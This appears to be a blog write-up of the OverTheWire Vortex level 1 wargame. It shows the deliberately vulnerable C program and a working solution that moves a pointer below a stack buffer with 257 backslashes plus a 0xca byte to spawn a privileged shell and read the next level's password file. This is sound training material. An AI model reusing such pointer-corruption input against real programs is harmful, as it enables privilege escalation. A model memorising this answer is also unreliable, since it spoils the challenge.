本文介绍如何通过特定输入绕过检查并获取shell权限,最终读取下一关密钥的过程。涉及bash处理EOF的方式及如何利用漏洞。
Level 1
-
Canary Values
- We are looking for a specific value in ptr. You may need to consider how bash handles EOF.. Reading Material
- Smashing the Stack for Fun and Profit Code listing ( vortex1.c)
-
1 #include <stdlib.h> 2 #include <unistd.h> 3 #include <string.h> 4 #include <stdio.h> 5 6 7 #define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); } 8 9 void print(unsigned char *buf, int len) 10 { 11 int i; 12 13 printf("[ "); 14 for(i=0; i < len; i++) printf("%x ", buf[i]); 15 printf(" ]\n"); 16 } 17 18 int main() 19 { 20 unsigned char buf[512]; 21 unsigned char *ptr = buf + (sizeof(buf)/2); 22 unsigned int x; 23 24 while((x = getchar()) != EOF) { 25 switch(x) { 26 case '\n': print(buf, sizeof(buf)); continue; break; 27 case '\\': ptr--; break; 28 default: e(); if(ptr > buf + sizeof(buf)) continue; ptr++[0] = x; break; 29 } 30 } 31 printf("All done\n"); 32 }
http://axtaxt.wordpress.com/2010/11/15/overthewire-vortex-level1/
Solution:
Login the server using the last level ssh account.
Execute /vortex/vortex1 to get the shell.
Try to move ptr before the buf by (512/2+1) times '\\'.
It's easy to write 0xca charactor by script, but It's hard to direct input it.
But I found the charactor below can produce 0xca.
| ʀ | 0xca 0x80 |
Then get the shell with uid of vortex2.
Get the next key from /etc/vortex_pass/vortex2
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ʀ
扫一扫
555
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
